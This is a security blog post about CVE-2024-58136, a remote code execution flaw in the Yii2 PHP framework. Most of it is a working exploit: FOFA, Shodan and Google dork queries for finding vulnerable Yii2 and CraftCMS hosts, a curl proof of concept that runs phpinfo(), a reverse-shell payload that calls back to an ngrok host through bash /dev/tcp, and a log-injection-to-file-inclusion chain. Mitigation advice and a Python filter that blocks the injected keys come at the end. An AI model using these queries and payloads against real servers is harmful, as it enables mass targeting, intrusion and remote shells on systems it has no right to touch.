From Behaviors to Shells: Yii2 PHP Framework RCE | CVE-2024–58136 — Exploit and Mitigation!
The Yii2 framework has a remote code execution vulnerability, CVE-2024-58136: an attacker can inject an arbitrary PHP class through the unvalidated `__class` parameter to achieve RCE. The article describes how to find affected applications with tools such as FOFA and Shodan, and walks through a `phpinfo()` test and a reverse-shell attack. It recommends upgrading to Yii2 2.0.52 or later and adding WAF protection to mitigate the risk. 2025-7-21 05:27:58 Author: infosecwriteups.com

nav1n👨🏻‍💻⚠️

CVE-2024–58136 is a critical remote code execution (RCE) vulnerability in the Yii2 PHP framework. It affects applications that allow behaviors to be attached to components using a JSON object that contains the __class parameter. The flaw lies in the improper validation of the __class key, allowing attackers to instantiate arbitrary PHP classes with controlled parameters — leading to RCE.

⚠️ For educational purposes only! Use this vulnerability ethically and report findings through responsible disclosure channels or bug bounty platforms.

This article demonstrates how to discover this vulnerability in real-world applications using search engines such as FOFA and Shodan, explains how to obtain a reverse shell, and covers mitigation.

We’ll also explore how the vulnerability works, walk through the exploitation chain (including authenticated CraftCMS LFI-to-RCE), and offer recommendations for detection and prevention.

Yii2 allows developers to attach behaviors to components dynamically using the as <name> syntax. When behaviors are defined using a JSON object (especially when yii\web\JsonParser is enabled), an attacker can supply the following structure:

Ref: https://attackerkb.com/topics/U2DdokjYhB/cve-2024-58136/rapid7-analysis

{
  "as hack": {
    "__class": "ArbitraryClass",
    "class": "ValidBehavior",
    "payload": "..."
  }
}

In vulnerable versions (prior to 2.0.52), Yii checks only the class key for subclassing yii\base\Behavior, but still instantiates whatever is in __class. This enables gadget-based RCE using destructors or controlled constructor arguments.

When such an object is parsed by Yii2 and later destructed, the gadget's destructor or closure runs; in the PoC below, this causes phpinfo() to execute.

CVE-2024–58136 — RCE PoC

1. FOFA Queries

title="yii" || header="X-Powered-By: Yii"

Refine by country or port if needed:

title="yii" || header="X-Powered-By: Yii" && port=xxx && country="XX"

2. Shodan Queries

Use this in Shodan:

http.headers:"X-Powered-By: Yii"

To narrow results:

http.favicon.hash:<known-hash-of-yii>

3. Google Dorks

intext:"powered by Yii Framework" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of

Step 1: phpinfo() Test for Confirmed RCE

curl -k -X POST https://target/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}'

Check if response includes phpinfo(), PHP Version, etc.

Step 2: Reverse Shell Payload

Set up a listener, then send the payload:

nc -lvnp 9988
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

1. FOFA Queries

body="Craft CMS" || header="Set-Cookie: CraftSessionId=" || header="X-Powered-By: Yii"

Refine by country or port if needed:

body="Craft CMS" && port=443 && country="US"

2. Shodan Queries

Use this in Shodan:

http.html:"Craft CMS" OR http.headers:"X-Powered-By: Yii"

To narrow results:

http.favicon.hash:<known-hash-of-craftcms>

3. Google Dorks

title:"Craft CMS" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of

Advanced Exploitation in CraftCMS

When CraftCMS is running on top of Yii2 (vulnerable version), and CSRF tokens are required, we chain the exploit:

Step 1: Log Injection

Use a reverse shell payload encoded and injected via Cookie or error page. Payload is logged.

Step 2: Trigger Log-Based LFI using PhpManager

{
  "as hack": {
    "__class": "yii\\rbac\\PhpManager",
    "class": "yii\\behaviors\\AttributeBehavior",
    "itemFile": "/tmp/runtime/logs/app.log"
  }
}

PhpManager includes the file named by itemFile, so the PHP code written to the log is executed, resulting in RCE.

Mitigation

  • Upgrade Yii2 to 2.0.52 or later
  • Add server-side WAF to block behavior keys like __class, as, on
  • Avoid accepting raw JSON from untrusted clients
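As an added illustration of the second and third mitigation points (example code, not from the original post or from the Yii project), here is a request-body check that flags JSON objects carrying the keys this vulnerability relies on. The key names come from the post; the sample bodies and the function names are constructed for the example.

```python
import json

# Keys a CVE-2024-58136 payload relies on: the "__class" override and
# Yii's dynamic "as <name>" / "on <event>" configuration syntax.
FORBIDDEN_KEYS = {"__class"}
FORBIDDEN_PREFIXES = ("as ", "on ")


def find_behavior_injection(body):
    """Recursively walk a decoded JSON body; return the paths of suspicious keys."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                here = f"{path}.{key}" if path else key
                if key in FORBIDDEN_KEYS or key.startswith(FORBIDDEN_PREFIXES):
                    hits.append(here)
                walk(value, here)          # nested objects can carry the keys too
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(body, "")
    return hits


def scan_request(raw_body):
    """Return ("block", hits) or ("pass", []) for a raw request body.

    Non-JSON bodies are passed through; the JsonParser would not decode them
    either, so they cannot reach the vulnerable configuration path this way.
    """
    try:
        decoded = json.loads(raw_body)
    except ValueError:
        return ("pass", [])
    hits = find_behavior_injection(decoded)
    return ("block", hits) if hits else ("pass", [])


# Constructed sample bodies (not real traffic): one benign, one shaped like the PoC above.
SAMPLES = {
    "benign": '{"title": "hello", "tags": ["a", "b"]}',
    "poc": '{"as hack": {"__class": "ArbitraryClass", "class": "ValidBehavior", "payload": "..."}}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_request(body))
```

A filter like this is defense in depth only: key matching is exact and case-sensitive, so the real fix remains upgrading to 2.0.52 or later.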

Conclusion

CVE-2024–58136 is an elegant yet dangerous logic flaw in how Yii2 handles dynamic behavior attachment. When paired with gadgets like FnStream or PhpManager, it leads to unauthenticated RCE or SSRF. Using FOFA, Shodan, and dorks, you can identify potentially thousands of vulnerable assets in the wild, but only a few will be exploitable because of CSRF protection, authentication requirements, or WAFs.


Article source: https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb?source=rss----7b722bfd1b8d---4